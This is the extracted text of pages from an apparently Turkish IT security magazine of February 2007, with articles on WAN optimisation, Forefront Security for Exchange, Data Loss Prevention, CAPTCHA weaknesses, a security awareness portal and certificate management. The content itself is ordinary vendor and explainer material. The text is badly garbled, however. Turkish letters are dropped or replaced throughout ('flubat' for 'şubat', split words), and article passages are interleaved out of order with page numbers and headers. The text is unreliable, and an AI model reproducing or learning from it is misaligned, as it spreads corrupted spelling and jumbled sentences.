perfromans nda 3 ile 100 kat aras nda geliflme sa lar. WX/WXC platformlar nda uygulamalar n önem derecesini ve/veya bantgeniflli i atamas n belirtebilirsiniz. WX/WXC platformlar sadece IP veya ToS/DiffServ bilgisine de il 7. seviye uygulama bilgisine göre de s n fland rma yapabilir. Örne in, 3. seviyede (Network) tüm Citix uygulamalar ayn gözüktü ü için SAP trafi ini yaz c ya gönderilen ifllemden ay rmak için 7. seviye bilgisine ihtiyaç duyulmaktad r. Policy-Based Multipath (Path Optimizasyonu) WX/WXC platformlar nda 2 hatta sahip lokasyonlarda uygulamalar n hangi hatt kullanaca n bu yetenek sayesinde belirleyebilirsiniz. Sistem, hatlar n performanslar n izleyerek, zaman içerisinde performans n kabul edilebilir seviyelerde olmamas durumunda otomatik olarak di er hatt kullanmas n sa layabilir. Raporlama WAN ve uygulama performans n art rmak için öncelikle a içerisinde hangi trafik tiplerinin oldu unu, farkl uygulamalar n ne kadar bantgeniflli i kulland n, a içerisinde s k flma yafland durumda performans n nas l etkilendi ini iyi analiz etmeniz gerekir. MSR s k flt rma yetene i farkl uygulama tiplerinden faydalan r. Hem k sa, yo un data trafi i yaratan uygulamalar n trafiklerini (Örnek: Citrix, HTTP), hem de uzun veri flablonlar yaratan trafikleri (Örnek: Word dosyas ) etkili bir flekilde azalt r. MSR sözlük tabanl oldu u için tekrarlanan flablonlar uzun baflka veriler aras nda kalsa bile azalt r. MSR s k flt rmas n n WAN hatlar n rahatlatmas çabuk gözlenir, PFA içeri i flu flekildedir: Fast Connection Setup K sa ömürlü ba lant lar n performans n, TCP ba lant kurulumunun round-trip zaman n eleyerek sa lar, bu flekilde HTTP gibi uygulamalar h zlan r. QoS (Bantgeniflli i Yönetimi) Bantgeniflli i yönetimi hem Quality of Service (QoS) yetene- ini hem de kritik ve gecikmeye duyarl uygulamalar için bantgeniflli i atamas n içermektedir. WX/WXC platformlar iki ana yaz l m arac sayesinde bu yetkinli i sa lar. WebView yaz l m cihaz n içerisinde yer alan, cihaz bafl na konfigürasyon, yönetim ve trafik gözlemlemesinin yap labildi i bir araçt r. WX Central Management System (CMS) yaz l m ise tek bir noktadan tüm WX/WXC platformlar n n konfigürasyon, yönetim ve trafik gözlemlemesinin yap labildi i bir araçt r. 28 beyazflapka flubat 2007 flubat 2007 beyazflapka 29

16 Mehmet ÜNER Forefront Security for Exchange Server Beyaz fiapka n n Kas m say s nda Exchange 2007 ile gelen güvenlik özelliklerinden bahsetmifltik. Bu güvenlik özellikleri d fl nda Exchange 2007 yi korumak için flu anda kullan labilecek Anti-virüs ve Anti-Spam yaz l mlar ndan biri de Microsoft Forefront Security for Exchange Server. Microsoft Antigen for Exchange Server in yeni versiyonu olan bu yaz l m, sadece Exchange 2007 ye kurulabiliyor. Exchange 2003 ve 2000 sunucular ise Microsoft Antigen for Exchange Server korumaya devam ediyor. Kas m ay nda Forefront sunucu ailesinin lansman yap lan di er ürünü de Forefront Security for Sharepoint. Forefront sunucu ailesi 2007 y l içinde gelecek olan Forefront Security for Office Communications ile tamamlanm fl olacak. Böylece e-posta sunucular, an nda mesajlaflma sunucular ve portal sunucular Forefront sunucu ailesiyle birlikte, gittikçe ak ll hale gelen ve uygulamalar hedef almaya bafllayan kötü niyetli sald r lara karfl koruma alt na girmifl olacaklar. Forefront Sunucu ailesinin en önemli özelli i, ister Sharepoint i ister Exchange sunucular ister an nda mesajlaflma sunucular - n koruyor olsun, bu korumay en üst düzeye ç karmak için endüstrinin önde gelen güvenlik firmalar ndan sa lanan tarama motorlar n tek bir çözümde birlefltirilmifl olmas d r. Böylece gelen bir e-posta, sharepoint sitesine yüklenen bir doküman veya an nda mesajlaflmadaki dosya transferleri tek bir anti-virüs motoru yerine, 9 ayr motor taraf ndan kontrol edilebiliyor (fiekil 1). Bu da, korumay oldukça yüksek bir seviyeye ç kar yor. (*) CSI/FBI 2006 Anketi fiekil 1 Forefront Sunucu Korumas 2006 da kurumlar n yaklafl k yüzde 97 si, virüslerden koruma yaz l m kullanmalar na ra men, yüzde 65 i virüs sald r lar ndan zarar gördü(*). Buna neyin sebep oldu u sorusunu kendimize sorarsak en önemli sebebin, kurumlar n tek bir tarama motoruna sahip anti-virus yaz l mlar kullanarak kritik görev sunucular n korumaya çal flmalar oldu unu görürüz. E er bu motor, en son riskleri h zla tan makta baflar s z olursa, veya o motora güncelleme gelifltiren anti-virüs laboratuvar bir virüs sald r s s ras nda güncellemede geç kal rsa, virüsler kurumlar n kritik sunucular na zarar verebilir. Bu senaryo Forefront sunucu ailesinde geçersiz oluyor, çünkü Forefront sunucu ailesi ön yüzünde Microsoft olmas na ra men 9 ayr anti-virüs motoru sayesinde 9 laboratuvar n gücünü kurumlara sunuyor (flekil 2). Böylece virüsler bir motoru atlat rlarsa di er motor taraf ndan yakalan yorlar, bir laboratuvar güncellemede gecikirse, di er laboratuvar bu aç kapat yor. Belki de hepsinden güzeli, ön yüzde sadece Microsoft oldu u için motorlar n bütün güncellemeleri ve ihtiyaç duyulan destek tek bir noktadan gelebiliyor. 9 ayr motora sahip olman n avantajlar ndan biri de güncellefltirmeler boyunca kesintiye u ramayan posta ak fl. Normal bir anti-virüs çözümünde güncellefltirme yap laca zaman e-postalar bekletilir ve tarama motoru için imza güncellefltirmesi yap l r. Forefront Sunucu ailesinde ise sahip olunan birden fazla motor çözümü ile, bir motor güncellefltirme için çevrimd fl oldu unda bile di er motorlar e-posta taramalar için kullan labilir. Yaz n n geri kalan nda Forefront Security for Exchange Server üzerinde biraz daha fazla dural m. Özellikle Exchange Server 2007 ye geçifl yapmay düflünen kurumlar için güvenlik aç s ndan oldukça önemli bir çözüm. Exchange Server 2007 beta sürümleri ile birlikte Forefront Security for Exchange Server in beta sürümlerinin ç kmas, Microsoft un güvenli e yeni bak fl - n n bir parças. Kritik uygulamalar daha beta aflamas ndayken, özel olarak tasarlanm fl güvenlik ürünleri ile koruma alt na al - nabildiler. Ve yeni sunucu uygulamalar piyasaya ç kt anda güvenlik ürünlerinin de son sürümleri haz rd. Exchange Server 2007, yeni sunucu rolleri ile gelifltirildi. Bunlar Edge, Hub, Mailbox, Client Access ve Unified Messaging rolleri. Forefront Security for Exchange Server bu rollerin hepsi üzerine kurulabilir ve Exchange Sistemlerini koruyabilir. Farkl rollerin olmas Exchange Sistemi için ayn zamanda performans artt r c bir özellik. Farkl rollere sahip sunucular, kurum içinde çok daha iyi bir ölçeklenme sa layabiliyorlar. Bu ayn zamanda virüs sistemi için de performans artt r c bir özellik. Çünkü mesajlar, Forefront ile ilk rolde tarand ktan ve güvenli olduklar na karar verildikten sonra di er rollerde Exchange 2007 ile entegre çal fl larak tarama yap lmas na gerek kalm yor. Tekrar tekrar tarama olmaks z n e-postalar daha h zl ak yor ve sunucular afl r yükten dolay performans kayb yaflam yorlar. Performans artt r c özelliklerden biri de Mailbox sunucular nda yap lan arka fiekil 2 Forefront Anti-virüs Motorlar plan taramalar için zaman ve posta kutusu tan mlar n n yap labilmesi. Böylece virüs tafl ma olas l yüksek posta kutular veya sadece son zamanlarda gelen e-posta lar kontrol edilebilir. Geriye dönük bütün posta kutular taranmad için performans kayb yine engelleniyor. Forefront ayn zamanda taramalar n bellek içinde yap yor. Tarama ifllemi için disk kullan lmad ndan ifllem çok daha h zl oluyor ve veri birikimi engelleniyor. Bununla beraber, birden fazla tarama ifllemi (daha fazla postay tek bir seferde ifllemek için) kullanabilme olas l, sunucu performans n oldukça gelifltiriyor. Performans konusu aç ld zaman akla gelen ilk fleylerden biri de Forefront içindeki 9 tarama motorunun beraber çal flmas n n performans nas l etkileyece idir. Bunun için Forefront içinde Bias ayarlar bulunmaktad r (fiekil-3). Bias ayarlar na örnek olarak maksimum güvenlik, maksimum performans ve neutral verilebilir. Maksimum güvenlik k sm nda seçilen bütün anti-virüs motorlar ayn anda kullan l r. Maksimum performans k sm nda ise seçilen motorlar n sadece %25 i kullan l r. Ayn flekilde neutral ayar nda seçilen motorlar n %50 si kullan l r. Forefront un anti-virüs motorlar n seçimi ise özel algoritmalara dayan r. Örnek olarak 4 motor ve neutral ayar seçilmiflse, gelen bir e-posta iki motor taraf ndan taran r. Bu motorlar geçmifl performanslar na, hangisinin daha fazla virüs yakalad ve en son güncellemeleri ne zaman yapt na göre seçilir. Böylece en iyi performans gösteren motorlar kuruma gelen e-postalar taram fl olurlar. fiekil 3 Forefront Bias Ayarlar Anti-virüs kadar birçok kurumun s k nt yaflad baflka bir konu ise istenmeyen e-posta lar. Bu kategori içerisinde spam, içerikleri kötü olan, veya istenmeyen eklentilere sahip olan e-postalar gösterilebilir. Forefront Security for Exchange Server, üst düzey içerik filtresi ile istenmeyen e-postalara karfl etkin bir koruma sa lar. Eski deneyimlerden yararlanarak problem çözme (deneyimsel) yöntemleri ve dosya filtreleme teknolojileri, tehlikeli dosyalar örne in çal flt r labilir dosyalar- uzant lar de iflmifl olsa bile yakalayarak kurumlar istenmeyen e-postalardan korur. Ayn flekilde spam korumas taraf ndaysa Microsoft IP Reputation Servisi, içerik filtreleme için Intelligent Message Filters (IMF) ve spam imza dosyalar gibi özellikler bulunmakta. Asl nda Exchange 2007 nin içinde bulunmalar na ra men, bu üst düzey istenmeyen e-posta koruma hizmetleri, sadece Forefront Security for Exchange Server lisans ile etkinlefltirilebilir. stenmeyen e-postalara karfl koruma araçlar, sürekli olarak etkin haldedir ve her gün birkaç kez otomatik olarak güncellefltirilir. Anti-virüs yaz l mlar n n en önemli sorunlar ndan biri de yönetim zorluklar d r. Forefront Security for Exchange Server ile bu sorun da ortadan kalk yor. Kendi yerleflik yönetim konsolu d - fl nda, web tabanl Microsoft Forefront Server Security Management konsolu ve Microsoft Operations Manager (MOM) entegrasyonu ile yönetim oldukça kolaylafl yor. Basitlefltirilmifl bir arayüz sunan yönetim konsolu üzerinden Forefront un bütün ayarlar yap labiliyor. Yönetim konsolu ile sunucular lokalden veya uzaktan yönetilebiliyor. Merkezi web tabanl yönetim sayesinde ise merkezi yap land rma, yerlefltirme ve güncellefltirme sa lan yor. Ayn zamanda birden fazla sunucu uzaktan kolayca yönetiliyor ve kapsaml raporlar oluflturulabiliyor. Son olarak belki de lisanslamadan bahsetmek gerekiyor. Forefront Security for Exchange Server lisans ile Exchange 2007 sunucular n korumak d fl nda, ayn zamanda Microsoft Exchange Server 2003 ve Microsoft Exchange Server 2000 ortamlar n n korunmas na yard mc olmak için Microsoft Antigen for Exchange, Microsoft Antigen for SMTP Gateways ve Antigen Spam Manager kullanmalar için de lisanslanm fl oluyor. Özetle Forefront sunucu ailesi, kurumlar n kritik uygulama sunucular n tam bir koruma alt na al yor ve kendine özel teknolojilerle güvenlik seviyesini en üst düzeye ç kar yor. Microsoft un güvenli e bak fl n n önemli bir parças olan Forefront sunucu ailesi, anti-virüs sektörünün en önemli oyuncular ndan biri olacakm fl gibi görünüyor. 30 beyazflapka flubat 2007 flubat 2007 beyazflapka 31

17 Sinan YILMAZ Data Loss Prevention(DLP) BEYAZ APKA OF S N ZE GELD, S ZE TESL M ED LD. S Z DE (UMARIZ) SABIRSIZLIKLA B LG SAYARINIZIN BA INDA BEYAZ APKA YI OKUMAYA BA LADINIZ. PEK, ÖNÜNÜZDEK B LG SAYARDA NE G B ÖNEML B LG LER VAR? Proje dokümanlar, bütçe dosyalar, rakip analizleri, personel giderleri, teknik dokümanlar, fiyat listeleri, araflt rma gelifltirme çal flmalar vs Hepimizin çok de erli bilgilerini tafl yor art k bilgisayarlar. Hem kendimiz hem de flirketimiz için de erli bilgiler. De erli veri bilgisayarlardan çeflitli yöntemlerle çal n rsa ya da iyi niyetli oldu- unu söyleyemeyece imiz flirket çal flanlar taraf ndan rakiplerimize s zd r l rsa zarar m z ne olur? Bu yaz Hiçbir fley olmaz can m diyenler için de ildir. Bahsetti im riskleri önlemek birço umuzun proje listesinde duruyor. Asl nda arad m z fleyin tam ad Data Loss Prevention. Nedir? Data Loss Prevention, son zamanlarda bilgi güvenli i sektöründe ad ndan s kça bahsedilen bir terim. Temel anlam bilgi kayb n n engellenmesi oldu u için ço u zaman yanl fl anlafl lmalara da neden olan DLP, sektörde standartlaflmaya bafllayan bir tabir oldu. Genifl olarak bakarsak bir antivirus yaz l m da bilgi kayb n engeller bir yedekleme yaz l m da. Ancak DLP terimi baflka bir mecraya do ru gidiyor. Gidiyor diyorum çünkü DLP sektörde de iflmez bir standart isim haline henüz gelebilmifl de il. Öyle ki bu yaz y yazd mda wikipedia ve kutsal bilgi kayna (?) ekfli sözlük Data Loss Prevention teriminin karfl l n henüz ö renememiflti. Ayr ca Gartner ve benzeri araflt rma kurumlar nda DLP ad nda bir kategori de henüz bulunmuyor. Sözünü edece im DLP ürünleri baz raporlarda içerik izleme ve filtreleme gibi kategorilerde yer alabiliyorlar. Data Loss Prevention, bilgi güvenli inde de erli verilerin baflkalar n n eline geçmesini engellemek üzere tasarlanm fl teknolojiye verilen bir isimdir. Ne yapar? DLP teknolojisi verinin kayna ile ilgilenir. Özel kullan c lar için ekstra yetkiler tan mlanabilmesine karfl n genel olarak bilgi koruma mant ayn d r. Hatta baz ürünlerde güvenilir kullan - c tan m bulunmaz. Merkezi olarak yönetilen DLP sistemi, önceden tan mlanm fl kaynaklar koruma alt na al r. Korunan kaynaklar üzerinde yap lan tüm ifllemler raporlan r ve kayna n güvenlik gözü ile izlenmesine imkân sa lan r. DLP ürünlerinin tamam girifl/ç k fl ayg tlar n n denetimini yapabilir. De erli verinin uygulamalar üzerinden ( , webmail, IM, P2P, Skype), a sistemleri üzerinden (wi-fi, bluetooth, http(s), ftp), fiziksel ayg tlar üzerinden (yaz c lar, usb haf zalar, faks, cd/dvd) baflka sistemlere gönderilmesini engeller. DLP veriyi korumaya yönelik gelifltirildi i için hack edilmifl, Truva at bulaflm fl, güvenlik zaaf bulunan veya hatal konfigüre edilmifl bilgisayarlardan veri çal nmas n engeller. Baz DLP ürünleri için kullan c n n nerede oldu u önemli de ildir. Tafl nabilir bilgisayarlar flirket a nda de ilken bile agent mimarisi sayesinde koruma kalkan n her zaman çal flt rabilir. DLP ürünleri sunucu sistemlerinde, istemcilerde, tafl nabilir bilgisayarlarda, Blackberry gibi avuçiçi bilgisayarlarda çal flt r labilir. Tüm DLP sistemi da t k ortamlarda olmas na ra men merkezi olarak yönetilebilir ve raporlanabilir. DLP ürünleri de iflik biçimlerde bulunan kaynaklar koruyabilir. fiifrelenmifl dosyalar, klasörler, bilgi bankalar, s k flt r lm fl dosyalar koruma alt na al nabilir. Ne de ildir? Data Loss Protection bilgi güvenli i sektöründe tam bir standarda kavuflmufl bir tabir de il. DLP oldu unu iddia eden ancak pek DLP kategorisine koyamayaca m z birkaç örnek verelim: Key Logger Yaz l mlar DLP oldu unu iddia eden bir ürün bilgisayarlar üzerinde dedektif gibi çal fl yor. Bilgisayarda girilmifl her veriyi gizlice kay t ediyor ve sistem yöneticisi (ya da patron) bu bilgileri görebiliyor. Üstelik baz önemli kelime ya da dosyalar n ifllem görmesi s ras nda yöneticilere otomatik bir gerçek zamanl uyar gönderilebiliyor. Ancak bu ürünleri genel DLP kategorisine almamak gerekir. Yedekleme Yaz l mlar Baz ürünler dokümanlar n güvenli ini sa lamak için, dokümanlar n her sürümünün bir yede ini tutar. De ifltirilen bir doküman n hem yeni hem de eski sürümleri sistem taraf ndan yedeklenir. htiyaç duyuldu u anda dosya istenilen sürüme geri dönülebilir. Ancak bu yaz l mlar n DLP olarak adland r lmas pek do ru say lmaz. Bu yaz l mlar gelifltirilmifl yedekleme yaz l mlar d r. Kurtarma Yaz l mlar Zarar görmüfl ve bozulmufl dosyalar kurtarmaya yarayan yaz l mlardan baz lar, DLP teriminin bilgi güvenli i sektöründe güncel bir terim haline gelmesi sebebi ile bu terimi kullanmaya bafllad lar. Ancak kurtarma yaz l mlar n n hiçbiri sözünü etti imiz DLP kategorisine girmez. DLP oldu unu iddia etmemesine karfl n, DLP ifllevleriyle kar flt r lan baz teknolojiler de var. Kar flt r lmasalar bile farklar n k saca üzerinden geçmek faydal olacakt r diye düflünüyorum ve birkaç örnek vermek istiyorum. Digital Rights Management (DRM) Data Loss Prevention bir Digital Rights Management ürünü de ildir. DRM verileri flifreli biçimde tutabilir ve daha önceden güvenli biçimde tan mlanm fl kullan c lara özel yetkiler tan mlanabilir (veriyi açabilme, de ifltirebilme, yazd rabilme, da tabilme, yeni yetki tan mlayabilme gibi). DRM ile güvenlik alt na al nm fl veriler baflka sistemlere transfer edilebilir. Ancak güvenli kullan c tan m nedeni ile yetkisiz kimseler bu verileri açamazlar. DRM, flifreleme ve yetkilendirme aç s ndan DLP den daha üstün bir üründür. Ancak kullan m için DRM kullan c lar n n biliflim sistemlerini kullanma kabiliyetlerinin yüksek olmas ve s k bir e itimden geçirilmeleri gerekir. Kullan m aç s ndan daha zor olan DRM, DLP nin rakibi de ildir. Hatta her iki sistem entegre edilip birlikte kullan labilir. Encryption DLP bir flifreleme ürünü de ildir. PKI ve benzeri yap larda flifrelenmifl veriler çal nsa bile, ilgili özel anahtara sahip olmayan kimselerce veriler görülemez. Birçok flifreleme ürünü veriyi sadece flifreler, yetkili kifli flifrelenmifl dosyay açt - nda içeri ini istedi i gibi baflkalar na gönderebilir. Dolay - s ile sadece flifreleme teknikleri DLP teknolojisinin yerini tutamaz. Sistem Güvenlik Yaz l m Host IPS ve benzeri ürünler sistem güvenli i ile ilgilenir. Ancak sistemde hangi verilerin bulundu undan haberdar de illerdir. Dolay s ile hiçbir sistem güvenli i yaz l m DLP teknolojisine muadil de ildir. Kullan m Alanlar Elbette DLP hizmetlerini istedi iniz her verinin korunmas için kullanabilirsiniz. S k kullan lan örneklerin k saca üzerinden geçmek istiyorum: Finansal Dokümanlar En s k kullan ld aland r. Bütçe, nakit ak fl, finansal risk analizleri ve bordro gibi hem flirketi içine hem flirket d fl na s zmas riskli olan dokümanlar DLP korumas alt na al n r. Kredi kart ve benzeri bilgileri de unutmayal m. Müflteri Bilgileri Müflteri listeleri, eriflim bilgileri, müflteriler ve sat lan ürünlerin iliflkilerinin bulundu u tablolar, potansiyel müflteri listeleri ve müflterilere özel uygulamalar n korunmas özellikle Sarbanes-Oxley gibi geliflmifl denetimlere tabi tutulan Amerikan flirketleri ve Amerikan borsalar nda ifllem gören uluslar aras flirketler için zorunluluktur. fiirketler gerek müflterilerini risklerden korumak, gerekse standartlara uymak için müflteri bilgilerini DLP ile koruma alt na al rlar. Kaynak Kodlar ç kullan m için ya da pazarlanmak için gelifltirilen yaz l mlar n kaynak kodlar n korumak, ilgili projenin ve ilgili flirketin gelece ini korumak anlam na gelir. DLP, kaynak kodlar n korunmas ve iyi niyetle olsa bile içeri inin baflkalar na gönderilmesini engellemek için iyi bir yöntemdir. Fikir Mülkiyeti Fikir ürünleri, telif haklar, müflterilere özel gelifltirilen proje dokümanlar, üretim formülleri ve benzeri bilgiler DLP ile korunarak ifl süreklili i sa lanabilir ve flirketin gelece i garanti alt na al nabilir. Coca-Cola n n formülünü merak etmeyen var m? Ürün Seçimi Bir Data Loss Prevention ürünü seçerken atlanmamas gereken birkaç konu bulunur. Elbette öncelikle ürünün deste- i Destek al namayan hiçbir ürün katma de erli hizmet sa layamaz. Ortam deste i, avuçiçi bilgisayarlar, dizüstü bilgisayarlar, sunucular vb... Koruma kabiliyeti, dosya içinde ekran görüntüsü al nabilmesi, uygulama ve a katmanlar nda koruma mekanizmas, koruncak sistemin yeri, çevrimiçi ve çevrimd fl kullan c lar için destek ve merkezi politika yönetimi. Sizin de fark edece iniz gibi yaz m n hiçbir bölümünde marka belirtmedim. Mevcut sisteme ve mevcut ihtiyaçlara göre farkl markalar daha verimli hizmetler sunabilir. Ancak en az ndan araflt rma yapabilmeniz için birkaç ürünü alfabetik s ra ile yazmak istiyorum. Oakley Networks, McAfee DLP, PortAuthority, Verdasys, Vericept, Vontu. Bilgileriniz hep sizin olsun. 32 beyazflapka flubat 2007 flubat 2007 beyazflapka 33

18 Serkan AKIN CAPTCHA Nedir, Neden Kullan l r Carnegie Mellon School of Computer Science taraf ndan gelifltirilen bir proje olan CAPTCHA n n amac, bilgisayar ile insanlar n davran fllar n ay rt etmek, istemcinin gerçekten bir insan oldu unu kan tlamakt r. Bu ayr m yapman n daha fazla gerekli oldu u web uygulamalar nda çok s k kullan lmaya bafllanm flt r. Sistemin çal flmas k saca flöyledir. Sunucu rastgele bir resim oluflturur, istemci taraf ndaki kifliden bu resimdeki yaz - y okuyup, ilgili alana girmesi istenir. Buradaki basit mant k o resimde sadece insan taraf ndan okunabilecek, bir program taraf ndan okunmas zor olan bir kelime oluflturmakt r. OCR (optik karakter tan ma) programlar, düzgün bir formda yaz lm fl yaz y bir resmin içinden okuyabilirler. Bu sebeple sunucu taraf ndan üretilen resmin içindeki yaz n n bir insan taraf ndan okunabilecek fakat OCR programlar taraf ndan okunamayacak derecede bozulmufl olmas gerekir. tiraf etmeliyim ki, CAPTCHA ile üretilmifl fakat benim okuyamad m resimlerle de karfl lafl yorum. Burada uygulamalar yaz y bozarken kantar n topuzunu mu kaç r yor, yoksa benim zaten insan olarak alg lanmamam m gerekiyor, ondan emin olamad m. flin flakas bir yana, gerçekten de üretilen karakterlerin bazen okunamamas veya çok geliflmifl OCR programlar taraf ndan bazen resimlerin okunabiliyor olmas gibi zay fl klar - na ra men, DYPM (Did You Pass Math, 3 art sekiz kaç eder? gibi sorular yönelterek otomatik yaz l mlar engelleyen) veya resimler aras ndan duygusal baz kriterlerle seçim yap lmas n isteyen v.b. gibi alternatif yöntemlerden flu an için daha kullan fll olmaya devam etmektedir. (Completely Automated Public Turing test to tell Computers and Humans Apart) CHA kontrollerinde, bilinen bir resme ait session ID si kullan larak, güvenlik herhangi bir OCR yaz l m kullanmadan da afl labilir. Paylafl lan sunucularda, ayn sunucuyu kullanan di er bir sanal host un yarataca güvenlik aç, CAPTCHA kullan lan siteyi de sald r lara aç k hale getirebilir. CAPTCHA resminin, istemci taraf nda oluflturuldu u uygulamalarda, kullan c taraf nda çal flt r lacak uygulamalarla resmin içine gizlenen metin, aç k olarak görüntülenerek okunabilir. Baz CAPTCHA sistemleri bunu önlemek için MD5 flifrelemesini kullanmas na ra men bu flifrelemeler de art k s kl kla k r labilmektedir. Uygulama.NET ile uygulama gelifltirenler için basit bir CAPTCHA kontrolü önerebilirim. Jeff Atwood taraf ndan gelifltirilen bu kontrol ile web uygulamalar n za befl dakika içerisinde bir CAPTCHA kontrolü ekleyebilirsiniz. Hem ASP.NET 1.1, hem de ASP.NET 2.0 için kaynak kodlar mevcut olan bu kontrolü ihtiyaçlar n za özel esnekliklerle kullanman z mümkün. Resim dinamik olarak üretilip, bellekten direkt olarak taray c ya gönderildi inden diskte yer kaplam yor. Resmin arkaplan, fontlar ve opsiyonel olarak çizdirilen ekstra çizgilerin bozulma derecelerini, birbirinden ba ms z olarak ayarlayabiliyorsunuz. Resmin boyutlar n, karakter say s n ve kullan lacak karakter setini belirleyebiliyorsunuz. ( 1, I, 0, O gibi birbiri ile kar flt r lma ihtimali olan karakterler gibi.) Murat LOSTAR Güvenlik portal na davet Internet, yararlar yan nda teknoloji ile birlikte gelen yeni yöntemlerin de yard m yla ne yaz k ki, eski suçlar n ifllendi i bir ortam olarak da günlük hayat m zda yer al - yor. Son zamanlarda gazetelerde ç kan haberleri inceledi imizde, birtak m f rsatç ve kötü niyetli kiflilerin bu konuyu sömürme girifliminde bulunma noktas nda harekete geçirmifl olduklar, nternet üzerinden, insanlar aldatarak k sa yoldan nas l para kazanabilirim? sorusunun cevab n arad klar n anl yoruz. Bu durumun do al sonucu olarak bir de büyüyen ma dur tabaka var. Özellikle sanal banka ma durlar, kaybettikleri paralar n da etkisiyle, bankalar daha güvenli olmaya zorluyorlar. Bu güzel bir geliflme. Son olarak internet bankac l kullan larak yap lan doland r c l klar n kurbanlar, haklar n aramak, toplu hareket ederek bu konuda bilinçlendirme sa lamak amac yla bir dernek kurdular. Bilgi ve biliflim güvenli i konusu, temel olarak üç kavram üzerinde ayakta durmakt r; Teknoloji, Süreçler ve nsan. Teknolojinin getirdi i problemleri yine yeni teknolojilerin çözmesi, bizlerin al fl k oldu u teknolojik yöntemlerle sa lan yor. Kap lardaki kilitlerden, antivirüs yaz l mlar na, flifreleme yöntemlerinden kimlik yönetimine kadar bir çok teknolojik çözüm, bize yard mc oluyor. Bilgi güvenli ini sa larken, teknolojiye tan ml yap lar n da yard mc olmas gerekiyor. Bu yap lar k saca süreçler bafll ile tan ml yoruz. Politikalar (güvenlik politikas, internet kullan m politikas, parola politikas vb.), prosedürler (parola de ifltirme prosedürü, ziyaretçi prosedürü, sistem odas - na cihaz sokma prosedürü), ve benzeri tüm dokümantasyon, yap lan ifllerin düzenlenmesine ve güvenli in sa lanmas na yard mc oluyor. Ancak son kullan c lara da düflen görevler var. Bunun bafl nda kullan c lar n almas gereken güvenlik önlemlerini bilmek ve uygulamak geliyor. Evimizi, arabam z, cüzdan m z korurken uygulad m z yöntemlerin benzerlerini bilgisayar m zdaki kimli imiz, bilgilerimiz ve param z için de uygulamam z gerekiyor. Peki teknoloji ile birlikte gelen riskler neler? Bu risklere kafl uygulanmas gereken önlemler nedir? Bu soruyu biliflim ve bilgi güvenli i uzmanlar yo un bir flekilde tart fl yorlar. Ancak son kullan c lara yönelik bilgilerin bir araya topland - Türkçe kaynak bulmak bu zamana kadar çok zordu. Bu eksikli i tamamlamak amac yla, kar amac gütmeyen, sponsorlar sayesinde yayg nlaflan bir portal hayata geçiyor: Bu portalda SPAM mesajlardan internet bankac l na, parolalardan nternet ve Çocuklar m z a kadar bir çok konu ele al n yor. Bu yaz y okuyan hemen herkesin, bilgi güvenli i konusunda birikimi oldukça yüksek Ya ifliniz bilgi güvenli i, ya da korunmas gereken önemli bilgilere sahipsiniz. Her durumda sadece teknolojiden ve süreçlerden de il, insanlardan da yard m almal s n z. Konuya katk s olabilecek tüm uzmanlardan, son kullan c lara yönelik basit anlat mla ele ald klar k sa ipuçlar, makaleleri, yöntemleri ve rastlad klar yeni parola avc l (Phishing) mesajlar n bekliyoruz. Konu ne olursa olsun, internet kullan m, kredi kartlar, SPAM, çocuklar m z, zararl içerikler vs. güvenlik ile ilgili her konu, bu yap içinde yer alacakt r. Son kullan c lar n anlayaca dilde olmas çok önemli. Ayr ca, mümkün oldu unca grafik ve flekillerle desteklenmesi, ilgiyi art racakt r. Amac m z, Türkçe konuflan internet kullan c lar - na, bilgi güvenli i konusunda daha da katk da bulunmak. Güvenli günler. Nerelerde Kullanabilirsiniz? Online Anketler, Üyelik formlar, E-Posta Servisleri, Site içi Arama Sayfalar, Arama Motorlar taraf ndan indekslenmesini istemedi iniz sayfalar n zda, Veya istemcinin bir robot olmas n istemeyece iniz tüm uygulamalarda... Güvenli Olmayan Uygulamalar CAPTCHA uygulamalar nda, gözden kaç r labilen iki güvenlik sorunundan bahsetmekte fayda var. Resmin session ID referans al narak üretildi i baz CAPT- Kontrolle ilgili kaynak kodlar ve kurulumla ilgili bilgiyi adresinden edinebilirsiniz. Kaynaklar: beyazflapka flubat 2007 flubat 2007 beyazflapka 35

19 Umut AYDIN Microsoft Certificate Lifecycle Manager n Getirdikleri Üretilen bilgilerin korunmas, y llarca biliflim sektörünün geliflmesine paralel olarak ilerleyen en yo un çal flmalar n bafl nda gelmifltir. Güvenlik teknolojilerindeki geliflmelerde bu do rultuda yerinde saymam flt r tabiat yla. lk zamanlar nda bilgisayar n tüm fifllerini çekmenin veya güvenli bir kasa içerisinde tutman n veri gizlili i için en temel ve güvenli yöntem oldu una inananlar, y llar sonra a teknolojileri, iflletme uygulamalar ve internetin geliflimiyle birlikte üretilen verinin güvenli bir biçimde paylaflt r lmas ihtiyac yla karfl laflt klar nda art k firewall lar üzerinde aç l p kapanan portlar n, dosyalara konulan parolalar n dahi yeterli olmad n gördüler. Günümüz bilgi güvenli i sektörünün en çok yükselen trendlerinin bafl nda Güvenli Kullan c Tan mlama modelleri gelmekte. Çok faktörlü kimlik do rulama (multifactor authentication) terimi de yak n bir geçmiflten beri, gerek ifl yaflam m z da, gerekse gündelik hayatta kulland m z finansal araçlarda (kredi kartlar, internet flubeleri) içten içe yerini almaya bafllad. Çok faktörlü kimlik tan mlama en basit anlat m yla; sahip olunan bir bilginin yan s ra (PIN, parola) çeflitli donan m veya verilerin (ak ll kart, USB token, biyometrik veriler) birlefltirilmesi ve karfl laflt r lmas sonucunda kiflinin yetki do rulamas n n yap lmas ifllemi olarak tarif edilebilir. Bu yöntemin günümüzde en yayg n kullan lan çeflidi, iki faktörlü kimlik do rulama (two factor authentication) olup, bildi- iniz bir fley ve sahip oldu unuz bir fley (something you have, something you own) mant yla çal flmaktad r. Piyasada ise bu konu ile ilgili en çok kullan lan donan mlar n bafl nda ak ll kartlar (smart card) ve USB token lar gelmektedir. RSA fiifreleme, sertifika depolama ve PIN do rulama gibi ifllemleri yapabilmelerinden ötürü, PKI (Public Key Infrastructure) uygulamalar nda bu ürünler kullan lmaktad r. PKI ayr - ca ülkemizde ve dünyada çeflitli sertifika makamlar taraf ndan vatandafllara verilen sertifikalarla, kanun kapsam nda belirtilen elektronik imza sistemi uygulamalar nda inkar edilmezli i sa lamak maksad yla da kullan lmakta. flletmelerde ise güvenli sistem girifli (secure logon), güvenli VPN eriflimi, dosya flifreleme ve imzalama ifllemleri baflta olmak üzere kifli do rulu unu kullan c sertifikalar yla ispatlama amac yla çal fl r. Daha evvel Windows Server 2003 ile birlikte gelen Certificate Authority (CA) servisleri ile birlikte PKI sistemi kurmay denediyseniz ve kullan c say n z da bir hayli fazlaysa muhtemelen kart, sertifika da t m ve yönetimi ile ilgili eksiklikleri yaflam fls n zd r. Microsoft, 2007 y l n n ilk çeyre- 